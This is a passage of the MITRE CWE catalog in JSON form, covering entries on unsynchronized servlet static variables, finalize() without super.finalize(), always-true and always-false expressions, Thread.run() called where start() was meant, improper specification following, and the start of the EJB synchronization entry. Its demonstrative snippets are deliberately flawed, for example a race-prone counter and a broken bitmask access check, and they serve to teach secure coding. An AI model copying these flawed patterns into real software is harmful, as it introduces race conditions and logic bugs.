multithreaded. This is a typical programming mistake in J2EE applications, since the multithreading is handled by the framework. When a shared variable can be influenced by an attacker, one thread could wind up modifying the variable to contain data that is not valid for a different thread that is also using the data within the variable.","Note that this weakness is not unique to servlets."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"820","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"488","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Modify Application Data","DoS: Instability","DoS: Crash, Exit, or Restart"],"Note":"If the shared variable contains sensitive data, it may be manipulated or displayed in another user session. If this data is used to control the application, its value can be manipulated to cause the application to crash or perform poorly."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Remove the use of static variables used between servlets. If this cannot be avoided, use synchronized access for these variables."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code implements a basic counter for how many times the page has been accesed.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public static class Counter extends HttpServlet {}","xhtml:div":{"#text":"static int count = 0;protected void doGet(HttpServletRequest in, HttpServletResponse out)throws ServletException, IOException {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"out.setContentType(\\"text/plain\\");PrintWriter p = out.getWriter();count++;p.println(count + \\" hits so far!\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}}},"Body_Text":["Consider when two separate threads, Thread A and Thread B, concurrently handle two different requests:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Assume this is the first occurrence of doGet, so the value of count is 0."},{"xhtml:div":"doGet() is called within Thread A."},{"xhtml:div":"The execution of doGet() in Thread A continues to the point AFTER the value of the count variable is read, then incremented, but BEFORE it is saved back to count. At this stage, the incremented value is 1, but the value of count is 0."},{"xhtml:div":"doGet() is called within Thread B, and due to a higher thread priority, Thread B progresses to the point where the count variable is accessed (where it is still 0), incremented, and saved. After the save, count is 1."},{"xhtml:div":"Thread A continues. It saves the intermediate, incremented value to the count variable - but the incremented value is 1, so count is \\"re-saved\\" to 1."}]}},"At this point, both Thread A and Thread B print that one hit has been seen, even though two separate requests have been processed. The value of count should be 2, not 1.","While this example does not have any real serious implications, if the shared variable in question is used for resource tracking, then resource consumption could occur. Other scenarios exist."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA00-J","Entry_Name":"Ensure visibility when accessing shared primitive variables"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA02-J","Entry_Name":"Ensure that compound operations on shared variables are atomic"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"25"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-09","Modification_Importance":"Critical","Modification_Comment":"Made name and description more specific to match the essence of the rest of the entry."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Unsynchronized Access to Shared Data","attr":{"@_Date":"2010-12-13"}}}},"568":{"attr":{"@_ID":"568","@_Name":"finalize() Method Without super.finalize()","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains a finalize() method that does not call super.finalize().","Extended_Description":"The Java Language Specification states that it is a good practice for a finalize() method to call super.finalize().","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"459","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Call the super.finalize() method."},{"Phase":"Testing","Description":"Use static analysis tools to spot such issues in your code."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following method omits the call to super.finalize().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"protected void finalize() {}","xhtml:div":{"#text":"discardNative();","attr":{"@_style":"margin-left:10px;"}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET12-J","Entry_Name":"Do not use finalizers"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Erroneous Finalize Method","attr":{"@_Date":"2008-04-11"}}}},"570":{"attr":{"@_ID":"570","@_Name":"Expression is Always False","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains an expression that will always evaluate to false.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"561","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Use Static Analysis tools to spot such conditions."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following Java example the updateUserAccountOrder() method used within an e-business product ordering/inventory application will validate the product number that was ordered and the user account number. If they are valid, the method will update the product inventory, the user account, and the user order appropriately.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void updateUserAccountOrder(String productNumber, String accountNumber) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean isValidProduct = false;boolean isValidAccount = false;if (validProductNumber(productNumber)) {}else {}if (validAccountNumber(accountNumber)) {}if (isValidProduct &amp;&amp; isValidAccount) {}","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"isValidProduct = true;updateInventory(productNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return;","attr":{"@_style":"margin-left:10px;"}},{"#text":"isValidProduct = true;updateAccount(accountNumber, productNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"updateAccountOrder(accountNumber, productNumber);","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"...if (validAccountNumber(accountNumber)) {}...","xhtml:br":["",""],"xhtml:div":{"#text":"isValidAccount = true;updateAccount(accountNumber, productNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}],"Body_Text":["However, the method never sets the isValidAccount variable after initializing it to false so the isValidProduct is mistakenly used twice. The result is that the expression \\"isValidProduct &amp;&amp; isValidAccount\\" will always evaluate to false, so the updateAccountOrder() method will never be invoked. This will create serious problems with the product ordering application since the user account and inventory databases will be updated but the order will not be updated.","This can be easily corrected by updating the appropriate variable."]},{"Intro_Text":"In the following example, the hasReadWriteAccess method uses bit masks and bit operators to determine if a user has read and write privileges for a particular process. The variable mask is defined as a bit mask from the BIT_READ and BIT_WRITE constants that have been defined. The variable mask is used within the predicate of the hasReadWriteAccess method to determine if the userMask input parameter has the read and write bits set.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define BIT_READ 0x0001 // 00000001#define BIT_WRITE 0x0010 // 00010000unsigned int mask = BIT_READ &amp; BIT_WRITE; /* intended to use \\"|\\" */// using \\"&amp;\\", mask = 00000000// using \\"|\\", mask = 00010001// determine if user has read and write accessint hasReadWriteAccess(unsigned int userMask) {}","xhtml:br":["","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// if the userMask has read and write bits set// then return 1 (true)if (userMask &amp; mask) {}// otherwise return 0 (false)return 0;","xhtml:br":["","","","",""],"xhtml:div":{"#text":"return 1;","attr":{"@_style":"margin-left:10px;"}}}}}},"Body_Text":["However the bit operator used to initialize the mask variable is the AND operator rather than the intended OR operator (CWE-480), this resulted in the variable mask being set to 0. As a result, the if statement will always evaluate to false and never get executed.","The use of bit masks, bit operators and bitwise operations on variables can be difficult. If possible, try to use frameworks or libraries that provide appropriate functionality and abstract the implementation."]},{"Intro_Text":"In the following example, the updateInventory method used within an e-business inventory application will update the inventory for a particular product. This method includes an if statement with an expression that will always evaluate to false. This is a common practice in C/C++ to introduce debugging statements quickly by simply changing the expression to evaluate to true and then removing those debugging statements by changing expression to evaluate to false. This is also a common practice for disabling features no longer needed.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int updateInventory(char* productNumber, int numberOfItems) {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int initCount = getProductCount(productNumber);int updatedCount = initCount + numberOfItems;int updated = updateProductCount(updatedCount);// if statement for debugging purposes onlyif (1 == 0) {}return updated;","xhtml:br":["","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char productName[128];productName = getProductName(productNumber);printf(\\"product %s initially has %d items in inventory \\\\n\\", productName, initCount);printf(\\"adding %d items to inventory for %s \\\\n\\", numberOfItems, productName);if (updated == 0) {}else {}","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"printf(\\"Inventory updated for product %s to %d items \\\\n\\", productName, updatedCount);","attr":{"@_style":"margin-left:10px;"}},{"#text":"printf(\\"Inventory not updated for product: %s \\\\n\\", productName);","attr":{"@_style":"margin-left:10px;"}}]}}}}}},"Body_Text":"Using this practice for introducing debugging statements or disabling features creates dead code that can cause problems during code maintenance and potentially introduce vulnerabilities. To avoid using expressions that evaluate to false for debugging purposes a logging API or debugging API should be used for the output of debugging messages."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC00-C","Entry_Name":"Compile cleanly at high warning levels"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"571":{"attr":{"@_ID":"571","@_Name":"Expression is Always True","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains an expression that will always evaluate to true.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"561","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Use Static Analysis tools to spot such conditions."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the updateInventory() method used within an e-business product ordering/inventory application will check if the input product number is in the store or in the warehouse. If the product is found, the method will update the store or warehouse database as well as the aggregate product database. If the product is not found, the method intends to do some special processing without updating any database.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void updateInventory(String productNumber) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean isProductAvailable = false;boolean isDelayed = false;if (productInStore(productNumber)) {}else if (productInWarehouse(productNumber)) {}else {}if ( isProductAvailable ) {}else if ( isDelayed ) {}","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"isProductAvailable = true;updateInStoreDatabase(productNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"isProductAvailable = true;updateInWarehouseDatabase(productNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"isProductAvailable = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"updateProductDatabase(productNumber);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"/* Warn customer about delay before order processing */"}}]}}}},"Body_Text":"However, the method never sets the isDelayed variable and instead will always update the isProductAvailable variable to true. The result is that the predicate testing the isProductAvailable boolean will always evaluate to true and therefore always update the product database. Further, since the isDelayed variable is initialized to false and never changed, the expression always evaluates to false and the customer will never be warned of a delay on their product."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC00-C","Entry_Name":"Compile cleanly at high warning levels"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"572":{"attr":{"@_ID":"572","@_Name":"Call to Thread run() instead of start()","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program calls a thread\'s run() method instead of calling start(), which causes the code to run in the thread of the caller instead of the callee.","Extended_Description":"In most cases a direct call to a Thread object\'s run() method is a bug. The programmer intended to begin a new thread of control, but accidentally called run() instead of start(), so the run() method will execute in the caller\'s thread of control.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"821","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use the start() method instead of the run() method."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following excerpt from a Java program mistakenly calls run() instead of start().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Thread thr = new Thread() {};thr.run();","xhtml:div":{"#text":"public void run() {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}},"xhtml:br":["",""]}}}},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"THI00-J","Entry_Name":"Do not invoke Thread.run()"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Call to Thread.run()","attr":{"@_Date":"2008-04-11"}}}},"573":{"attr":{"@_ID":"573","@_Name":"Improper Following of Specification by Caller","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not follow or incorrectly follows the specifications as required by the implementation language, environment, framework, protocol, or platform.","Extended_Description":"When leveraging external functionality, such as an API, it is important that the caller does so in accordance with the requirements of the external functionality or else unintended behaviors may result, possibly leaving the system vulnerable to any number of exploits.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-7140","Description":"Crypto implementation removes padding when it shouldn\'t, allowing forged signatures","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7140"},{"Reference":"CVE-2006-4339","Description":"Crypto implementation removes padding when it shouldn\'t, allowing forged signatures","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET10-J","Entry_Name":"Follow the general contract when implementing the compareTo() method"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Follow Specification","attr":{"@_Date":"2011-03-29"}}}},"574":{"attr":{"@_ID":"574","@_Name":"EJB Bad Practices: Use of Synchronization Primitives","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program violates the Enterprise JavaBeans (EJB) specification by using thread synchronization primitives.","Extended_Description":"The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: \\"An enterprise bean must not use thread synchronization primitives to synchronize execution of multiple instances.\\" The specification justifies this requirement in the following way: \\"This rule is required to ensure consistent runtime semantics because while some EJB containers may use a single JVM to execute all enterprise bean\'s instances, others may distribute the instances across multiple 